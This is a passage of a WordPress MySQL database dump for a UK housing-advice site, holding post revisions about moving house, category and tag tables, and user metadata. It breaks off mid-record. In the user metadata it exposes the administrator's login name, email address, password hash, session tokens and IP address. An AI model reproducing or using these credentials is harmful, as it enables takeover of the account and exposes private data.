fusion-column-no-min-height 1_1\">\r\n<div class=\"fusion-column-wrapper\" data-bg-url=\"\">\r\n\r\n<strong>Following these steps will help secure the right electrician for you.</strong>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</article></section></div>\r\n</div>\r\n</div>','The best way to choose an electrician','','inherit','closed','closed','','105-revision-v1','','','2021-08-20 13:29:21','2021-08-20 13:29:21','',105,'https://housing-today.co.uk/?p=290',0,'revision','',0),(291,1,'2021-08-20 14:01:30','2021-08-20 14:01:30','','home improvements','','inherit','closed','closed','','home-improvements','','','2021-08-20 14:01:30','2021-08-20 14:01:30','',287,'http://housing-today.co.uk/wp-content/uploads/2021/08/home-improvements.jpg',0,'attachment','image/jpeg',0),(292,1,'2021-08-20 14:02:04','2021-08-20 14:02:04','<h2><span data-preserver-spaces=\"true\">Start unpacking</span></h2>\r\n<span data-preserver-spaces=\"true\">The </span><strong><span data-preserver-spaces=\"true\">first thing that has to be undone</span></strong><span data-preserver-spaces=\"true\"> is all of the box unpacking.</span>\r\n\r\n<span data-preserver-spaces=\"true\">It\'s often the most boring and long part of the job - but it is the most important and already has your house looking more like your home.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Many people do it in different ways. Some may do it in order of the biggest box to the smallest box, whilst some others may do it on a room-to-room basis.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Whatever is easier for you is </span><a class=\"editor-rtfLink\" href=\"https://www.thespruce.com/unpack-your-entire-home-2435815\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">the best way to do it</span></a><span data-preserver-spaces=\"true\">.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Hint: </span><em><span data-preserver-spaces=\"true\">always be sure to label your boxes before your move so it saves you time.</span></em>\r\n<iframe title=\"YouTube video player\" src=\"https://www.youtube-nocookie.com/embed/N6_tYHy4AFE\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h2><span data-preserver-spaces=\"true\">Do a full-house cleaning</span></h2>\r\n<span data-preserver-spaces=\"true\">When you are done with the unpacking you might notice exactly how much rubbish is in the house. No one expects it to have so much rubbish, but it\'s always best to be prepared.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Regardless if you do it after unpacking a room, or after the whole house is unpacked, it would be beneficial to do a </span><a class=\"editor-rtfLink\" href=\"https://prohousekeepers.com/blog/essential-cleaning-to-dos-before-you-start-unpacking-your-new-home/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">full-house clean up</span></a><span data-preserver-spaces=\"true\"> and put all the unwanted items to one side.</span>\r\n\r\n<span data-preserver-spaces=\"true\">The hardest thing to get rid of when cleaning is all the unwanted rubbish and waste that takes up a lot of room.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Rubbish Clearance is a rubbish removal expert and has been providing their waste removal services across the UK for many years. </span>\r\n\r\n<span data-preserver-spaces=\"true\">Why take the chance of doing your rubbish removal which will require your own time and resources? Rubbish Clearance is the specialists at getting rid of household waste in time for a new move. </span><a class=\"editor-rtfLink\" href=\"http://rubbish.me.uk/services/rubbish-clearance\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Read here.</span></a>\r\n<h2><span data-preserver-spaces=\"true\">Make a list of things to do the next day</span></h2>\r\n<span data-preserver-spaces=\"true\">Moves are tiring and not everything can be done within one day.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Whatever you can\'t do on a moving day, make a note of the remainder of </span><a class=\"editor-rtfLink\" href=\"https://hoa.org.uk/2019/04/10-ways-to-settle-into-your-new-neighbourhood/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">things that you have not yet done</span></a><span data-preserver-spaces=\"true\">.</span>\r\n\r\n<span data-preserver-spaces=\"true\">It might be small things like:</span>\r\n<ul>\r\n <li><span data-preserver-spaces=\"true\">Say hi to all of the new neighbours</span></li>\r\n <li><span data-preserver-spaces=\"true\">Inform banks, work and schools about the new address</span></li>\r\n <li><span data-preserver-spaces=\"true\">Stock up on enough food to keep the household fed for a week</span></li>\r\n</ul>\r\n<span data-preserver-spaces=\"true\">Don\'t focus on doing everything in one day. Fully moving into a new house takes time, so do as much as you can on the first day and get the remainder done in the following days.</span>\r\n<h2><span data-preserver-spaces=\"true\">More</span></h2>\r\n<a class=\"editor-rtfLink\" href=\"https://www.moving.com/tips/36-moving-hacks-faster-easier-less-stressful-move/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">36 Moving Hacks for a Faster, Easier, and Less Stressful Move | Moving.com</span></a>\r\n\r\n<a class=\"editor-rtfLink\" href=\"https://makespace.com/blog/posts/moving-packing-tips/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">41 Moving And Packing Tips To Make Your Move Dead Simple | Make Space</span></a>\r\n\r\n<a class=\"editor-rtfLink\" href=\"https://www.housebeautiful.com/uk/renovate/a1531/real-truth-about-moving-house/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">What Nobody Tells You About Moving House - Moving House Tips | House Beautiful</span></a>','Getting your new home ready after a move','','inherit','closed','closed','','287-revision-v1','','','2021-08-20 14:02:04','2021-08-20 14:02:04','',287,'https://housing-today.co.uk/?p=292',0,'revision','',0),(293,1,'2021-08-20 14:02:38','2021-08-20 14:02:38','<h2><span data-preserver-spaces=\"true\">Start unpacking</span></h2>\r\n<span data-preserver-spaces=\"true\">The </span><strong><span data-preserver-spaces=\"true\">first thing that has to be undone</span></strong><span data-preserver-spaces=\"true\"> is all of the box unpacking.</span>\r\n\r\n<span data-preserver-spaces=\"true\">It\'s often the most boring and long part of the job - but it is the most important and already has your house looking more like your home.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Many people do it in different ways. Some may do it in order of the biggest box to the smallest box, whilst some others may do it on a room-to-room basis.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Whatever is easier for you is </span><a class=\"editor-rtfLink\" href=\"https://www.thespruce.com/unpack-your-entire-home-2435815\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">the best way to do it</span></a><span data-preserver-spaces=\"true\">.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Hint: </span><em><span data-preserver-spaces=\"true\">always be sure to label your boxes before your move so it saves you time.</span></em>\r\n<iframe title=\"YouTube video player\" src=\"https://www.youtube-nocookie.com/embed/N6_tYHy4AFE\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h2><span data-preserver-spaces=\"true\">Do a full-house cleaning</span></h2>\r\n<span data-preserver-spaces=\"true\">When you are done with the unpacking you might notice exactly how much rubbish is in the house. No one expects it to have so much rubbish, but it\'s always best to be prepared.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Regardless if you do it after unpacking a room, or after the whole house is unpacked, it would be beneficial to do a </span><a class=\"editor-rtfLink\" href=\"https://prohousekeepers.com/blog/essential-cleaning-to-dos-before-you-start-unpacking-your-new-home/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">full-house clean up</span></a><span data-preserver-spaces=\"true\"> and put all the unwanted items to one side.</span>\r\n\r\n<em>The hardest thing to get rid of when cleaning is all the unwanted rubbish and waste that takes up a lot of room.</em>\r\n\r\n<span data-preserver-spaces=\"true\">Rubbish Clearance is a rubbish removal expert and has been providing their waste removal services across the UK for many years. </span>\r\n\r\n<span data-preserver-spaces=\"true\">Why take the chance of doing your rubbish removal which will require your own time and resources? Rubbish Clearance is the specialists at getting rid of household waste in time for a new move. </span><a class=\"editor-rtfLink\" href=\"http://rubbish.me.uk/services/rubbish-clearance\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">Read here.</span></a>\r\n<h2><span data-preserver-spaces=\"true\">Make a list of things to do the next day</span></h2>\r\n<span data-preserver-spaces=\"true\">Moves are tiring and not everything can be done within one day.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Whatever you can\'t do on a moving day, make a note of the remainder of </span><a class=\"editor-rtfLink\" href=\"https://hoa.org.uk/2019/04/10-ways-to-settle-into-your-new-neighbourhood/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">things that you have not yet done</span></a><span data-preserver-spaces=\"true\">.</span>\r\n\r\n<span data-preserver-spaces=\"true\">It might be small things like:</span>\r\n<ul>\r\n <li><span data-preserver-spaces=\"true\">Say hi to all of the new neighbours</span></li>\r\n <li><span data-preserver-spaces=\"true\">Inform banks, work and schools about the new address</span></li>\r\n <li><span data-preserver-spaces=\"true\">Stock up on enough food to keep the household fed for a week</span></li>\r\n</ul>\r\n<span data-preserver-spaces=\"true\">Don\'t focus on doing everything in one day. Fully moving into a new house takes time, so do as much as you can on the first day and get the remainder done in the following days.</span>\r\n<h2><span data-preserver-spaces=\"true\">More</span></h2>\r\n<a class=\"editor-rtfLink\" href=\"https://www.moving.com/tips/36-moving-hacks-faster-easier-less-stressful-move/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">36 Moving Hacks for a Faster, Easier, and Less Stressful Move | Moving.com</span></a>\r\n\r\n<a class=\"editor-rtfLink\" href=\"https://makespace.com/blog/posts/moving-packing-tips/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">41 Moving And Packing Tips To Make Your Move Dead Simple | Make Space</span></a>\r\n\r\n<a class=\"editor-rtfLink\" href=\"https://www.housebeautiful.com/uk/renovate/a1531/real-truth-about-moving-house/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">What Nobody Tells You About Moving House - Moving House Tips | House Beautiful</span></a>','Getting your new home ready after a move','','inherit','closed','closed','','287-revision-v1','','','2021-08-20 14:02:38','2021-08-20 14:02:38','',287,'https://housing-today.co.uk/?p=293',0,'revision','',0),(294,1,'2021-08-24 13:31:26','2021-08-24 13:31:26','<h2><a href=\"/\"><span data-preserver-spaces=\"true\">Start unpacking</span></a></h2>\r\n<span data-preserver-spaces=\"true\">The </span><strong><span data-preserver-spaces=\"true\">first thing that has to be undone</span></strong><span data-preserver-spaces=\"true\"> is all of the box unpacking.</span>\r\n\r\n<span data-preserver-spaces=\"true\">It\'s often the most boring and long part of the job - but it is the most important and already has your house looking more like your home.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Many people do it in different ways. Some may do it in order of the biggest box to the smallest box, whilst some others may do it on a room-to-room basis.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Whatever is easier for you is </span><span data-preserver-spaces=\"true\">the best way to do it</span><span data-preserver-spaces=\"true\">.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Hint: </span><em><span data-preserver-spaces=\"true\">always be sure to label your boxes before your move so it saves you time.</span></em>\r\n<iframe title=\"YouTube video player\" src=\"https://www.youtube-nocookie.com/embed/N6_tYHy4AFE\" width=\"560\" height=\"315\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n<h2><span data-preserver-spaces=\"true\">Do a full-house cleaning</span></h2>\r\n<span data-preserver-spaces=\"true\">When you are done with the unpacking you might notice exactly how much rubbish is in the house. No one expects it to have so much rubbish, but it\'s always best to be prepared.</span>\r\n\r\n<strong>Regardless if you do it after unpacking a room, or after the whole house is unpacked, it would be beneficial to do a <a class=\"editor-rtfLink\" href=\"https://prohousekeepers.com/blog/essential-cleaning-to-dos-before-you-start-unpacking-your-new-home/\" target=\"_blank\" rel=\"noopener\">full-house clean up</a> and put all the unwanted items to one side.</strong>\r\n\r\n<em>The hardest thing to get rid of when cleaning is all the unwanted rubbish and waste that takes up a lot of room.</em>\r\n\r\n<span data-preserver-spaces=\"true\">Rubbish Clearance is a <a href=\"http://rubbish.me.uk/services/rubbish-clearance\" target=\"_blank\" rel=\"noopener\">rubbish removal expert</a> and has been providing their waste removal services across the UK for many years. </span>\r\n<blockquote><span data-preserver-spaces=\"true\">Why take the chance of doing your rubbish removal which will require your own time and resources? Rubbish Clearance is the specialists at getting rid of household waste in time for a new move. </span></blockquote>\r\n<h2><span data-preserver-spaces=\"true\">Make a list of things to do the next day</span></h2>\r\n<span data-preserver-spaces=\"true\">Moves are tiring and not everything can be done within one day.</span>\r\n\r\n<span data-preserver-spaces=\"true\">Whatever you can\'t do on a moving day, make a note of the remainder of </span><a class=\"editor-rtfLink\" href=\"https://hoa.org.uk/2019/04/10-ways-to-settle-into-your-new-neighbourhood/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">things that you have not yet done</span></a><span data-preserver-spaces=\"true\">.</span>\r\n\r\n<span data-preserver-spaces=\"true\">It might be small things like:</span>\r\n<ul>\r\n <li><span data-preserver-spaces=\"true\">Say hi to all of the new neighbours</span></li>\r\n <li><span data-preserver-spaces=\"true\">Inform banks, work and schools about the new address</span></li>\r\n <li><span data-preserver-spaces=\"true\">Stock up on enough food to keep the household fed for a week</span></li>\r\n</ul>\r\n<span data-preserver-spaces=\"true\">Don\'t focus on doing everything in one day. Fully moving into a new house takes time, so do as much as you can on the first day and get the remainder done in the following days.</span>\r\n<h2><span data-preserver-spaces=\"true\">More</span></h2>\r\n<ul>\r\n <li><a class=\"editor-rtfLink\" href=\"https://www.moving.com/tips/36-moving-hacks-faster-easier-less-stressful-move/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">36 Moving Hacks for a Faster, Easier, and Less Stressful Move | Moving.com</span></a></li>\r\n <li><a class=\"editor-rtfLink\" href=\"https://makespace.com/blog/posts/moving-packing-tips/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">41 Moving And Packing Tips To Make Your Move Dead Simple | Make Space</span></a></li>\r\n <li><a class=\"editor-rtfLink\" href=\"https://www.housebeautiful.com/uk/renovate/a1531/real-truth-about-moving-house/\" target=\"_blank\" rel=\"noopener\"><span data-preserver-spaces=\"true\">What Nobody Tells You About Moving House - Moving House Tips | House Beautiful</span></a></li>\r\n</ul>','Getting your new home ready after a move','','inherit','closed','closed','','287-revision-v1','','','2021-08-24 13:31:26','2021-08-24 13:31:26','',287,'https://housing-today.co.uk/?p=294',0,'revision','',0),(296,1,'2021-09-16 10:48:00','2021-09-16 10:48:00','','Property Insurance','','publish','closed','closed','','property-insurance','','','2021-09-16 10:48:03','2021-09-16 10:48:03','',0,'https://housing-today.co.uk/?page_id=296',0,'page','',0),(297,1,'2021-09-16 10:48:00','2021-09-16 10:48:00','','Property Insurance','','inherit','closed','closed','','296-revision-v1','','','2021-09-16 10:48:00','2021-09-16 10:48:00','',296,'https://housing-today.co.uk/?p=297',0,'revision','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_term_relationships`
--
DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_relationships` (
`object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`term_order` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`object_id`,`term_taxonomy_id`),
KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_term_relationships`
--
LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES (1,2,0),(15,3,0),(19,4,0),(19,5,0),(27,6,0),(28,6,0),(29,6,0),(30,6,0),(31,6,0),(32,6,0),(35,4,0),(35,5,0),(35,8,0),(92,6,0),(94,9,0),(105,10,0),(135,8,0),(135,11,0),(158,10,0),(180,11,0),(180,12,0),(180,13,0),(180,14,0),(209,5,0),(209,12,0),(209,15,0),(209,16,0),(209,17,0),(209,18,0),(262,6,0),(282,8,0),(282,19,0),(282,20,0),(287,11,0),(287,21,0),(287,22,0),(287,23,0),(287,24,0),(287,25,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_term_taxonomy`
--
DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_taxonomy` (
`term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`taxonomy` varchar(32) NOT NULL DEFAULT '',
`description` longtext NOT NULL,
`parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`count` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`term_taxonomy_id`),
UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=26 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_term_taxonomy`
--
LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,0),(2,2,'category','',0,1),(3,3,'category','',0,1),(4,4,'category','',0,2),(5,5,'category','',0,3),(6,6,'nav_menu','',0,8),(7,7,'nav_menu','',0,0),(8,8,'category','',0,3),(9,9,'category','',0,1),(10,10,'category','',0,2),(11,11,'category','',0,3),(12,12,'post_tag','',0,2),(13,13,'post_tag','',0,1),(14,14,'post_tag','',0,1),(15,15,'category','',0,1),(16,16,'post_tag','',0,1),(17,17,'post_tag','',0,1),(18,18,'post_tag','',0,1),(19,19,'post_tag','',0,1),(20,20,'post_tag','',0,1),(21,21,'post_tag','',0,1),(22,22,'post_tag','',0,1),(23,23,'post_tag','',0,1),(24,24,'post_tag','',0,1),(25,25,'post_tag','',0,1);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_termmeta`
--
DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_termmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `term_id` (`term_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_termmeta`
--
LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_terms`
--
DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_terms` (
`term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(200) NOT NULL DEFAULT '',
`slug` varchar(200) NOT NULL DEFAULT '',
`term_group` bigint(10) NOT NULL DEFAULT 0,
PRIMARY KEY (`term_id`),
KEY `slug` (`slug`(191)),
KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=26 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_terms`
--
LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'Interior Design','interior-design',0),(3,'Kitchen Designs','kitchen-designs',0),(4,'Roof','roof',0),(5,'Exterior','exterior',0),(6,'Main','main',0),(7,'footer','footer',0),(8,'Property Development','property-development',0),(9,'wiring','wiring',0),(10,'Electricity','electricity',0),(11,'home','home',0),(12,'cleaning','cleaning',0),(13,'removals','removals',0),(14,'money','money',0),(15,'garden','garden',0),(16,'clearing','clearing',0),(17,'maintenance','maintenance',0),(18,'advice','advice',0),(19,'property developers','property-developers',0),(20,'loans','loans',0),(21,'rubbish clearance','rubbish-clearance',0),(22,'rubbish removal','rubbish-removal',0),(23,'waste clearance','waste-clearance',0),(24,'waste removal','waste-removal',0),(25,'new move','new-move',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_tm_taskmeta`
--
DROP TABLE IF EXISTS `wp_tm_taskmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_tm_taskmeta` (
`meta_id` bigint(20) NOT NULL AUTO_INCREMENT,
`task_id` bigint(20) NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `meta_key` (`meta_key`(191)),
KEY `task_id` (`task_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_tm_taskmeta`
--
LOCK TABLES `wp_tm_taskmeta` WRITE;
/*!40000 ALTER TABLE `wp_tm_taskmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_tm_taskmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_tm_tasks`
--
DROP TABLE IF EXISTS `wp_tm_tasks`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_tm_tasks` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) NOT NULL,
`type` varchar(300) NOT NULL,
`class_identifier` varchar(300) DEFAULT '0',
`attempts` int(11) DEFAULT 0,
`description` varchar(300) DEFAULT NULL,
`time_created` timestamp NOT NULL DEFAULT current_timestamp(),
`last_locked_at` bigint(20) DEFAULT 0,
`status` varchar(300) DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `user_id` (`user_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_tm_tasks`
--
LOCK TABLES `wp_tm_tasks` WRITE;
/*!40000 ALTER TABLE `wp_tm_tasks` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_tm_tasks` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_usermeta`
--
DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_usermeta` (
`umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`umeta_id`),
KEY `user_id` (`user_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=42 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_usermeta`
--
LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
INSERT INTO `wp_usermeta` VALUES (1,1,'nickname','housing-today'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(10,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(11,1,'wp_user_level','10'),(12,1,'dismissed_wp_pointers',''),(13,1,'show_welcome_panel','1'),(14,1,'session_tokens','a:4:{s:64:\"416c40224d169c2405a21ee43ec04e6c072bac4081e49edc72273d9b5cb39e7c\";a:4:{s:10:\"expiration\";i:1632998789;s:2:\"ip\";s:14:\"185.175.113.72\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36\";s:5:\"login\";i:1631789189;}s:64:\"5ff986a110ff6b8b9e413d18c2c26baf4928e87a4cb3f519432f60f48de92ecf\";a:4:{s:10:\"expiration\";i:1633095035;s:2:\"ip\";s:14:\"185.175.113.72\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\";s:5:\"login\";i:1631885435;}s:64:\"86663ce5ee35ab1f796fed24bf0c125b4fe52872a0fbed0c20fd7c4e5b218b0f\";a:4:{s:10:\"expiration\";i:1632060281;s:2:\"ip\";s:14:\"185.175.113.72\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\";s:5:\"login\";i:1631887481;}s:64:\"6961343927afd99dbcfba8ea8d89a84ce802e6e83119b08e2e50a6235f52c5e1\";a:4:{s:10:\"expiration\";i:1632060375;s:2:\"ip\";s:14:\"185.175.113.72\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\";s:5:\"login\";i:1631887575;}}'),(15,1,'wp_dashboard_quick_press_last_post_id','295'),(17,1,'wp_user-settings','editor=html&libraryContent=browse&hidetb=1&imgsize=full&align=center&urlbutton=custom'),(18,1,'wp_user-settings-time','1629717909'),(19,1,'_yoast_wpseo_profile_updated','1486482820'),(20,1,'nav_menu_recently_edited','6'),(21,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(22,1,'metaboxhidden_nav-menus','a:1:{i:0;s:12:\"add-post_tag\";}'),(23,1,'last_login_time','2021-09-17 14:06:15'),(24,1,'wpseo_title',''),(25,1,'wpseo_metadesc',''),(26,1,'wpseo_metakey',''),(27,1,'wpseo_excludeauthorsitemap',''),(28,1,'wpseo_content_analysis_disable',''),(29,1,'wpseo_keyword_analysis_disable',''),(30,1,'googleplus',''),(31,1,'twitter',''),(32,1,'facebook',''),(33,1,'closedpostboxes_page','a:0:{}'),(34,1,'metaboxhidden_page','a:6:{i:0;s:11:\"postexcerpt\";i:1;s:10:\"postcustom\";i:2;s:16:\"commentstatusdiv\";i:3;s:11:\"commentsdiv\";i:4;s:7:\"slugdiv\";i:5;s:9:\"authordiv\";}'),(35,1,'community-events-location','a:1:{s:2:\"ip\";s:13:\"185.175.113.0\";}'),(36,1,'syntax_highlighting','true'),(37,1,'locale',''),(38,1,'wfls-last-login','1629710579'),(41,1,'wp_yoast_notifications','a:1:{i:0;a:2:{s:7:\"message\";s:355:\"<p>You can speed up your site and get insight into your internal linking structure by letting us perform a few optimizations to the way SEO data is stored. </p><p>We estimate this will take less than a minute.</p><a class=\"button\" href=\"https://housing-today.co.uk/wp-admin/admin.php?page=wpseo_tools&start-indexation=true\">Start SEO data optimization</a>\";s:7:\"options\";a:10:{s:4:\"type\";s:7:\"warning\";s:2:\"id\";s:13:\"wpseo-reindex\";s:4:\"user\";O:7:\"WP_User\":8:{s:4:\"data\";O:8:\"stdClass\":10:{s:2:\"ID\";s:1:\"1\";s:10:\"user_login\";s:5:\"admin\";s:9:\"user_pass\";s:34:\"$P$BM9GwcFF5Y8TDUK43X1wluE1N.BbAl0\";s:13:\"user_nicename\";s:13:\"housing-today\";s:10:\"user_email\";s:23:\"bensykes@bensykes.co.uk\";s:8:\"user_url\";s:0:\"\";s:15:\"user_registered\";s:19:\"2016-11-29 14:17:36\";s:19:\"user_activation_key\";s:0:\"\";s:11:\"user_status\";s:1:\"0\";s:12:\"display_name\";s:13:\"housing-today\";}s:2:\"ID\";i:1;s:4:\"caps\";a:1:{s:13:\"administrator\";b:1;}s:7:\"cap_key\";s:15:\"wp_capabilities\";s:5:\"roles\";a:1:{i:0;s:13:\"administrator\";}s:7:\"allcaps\";a:67:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7: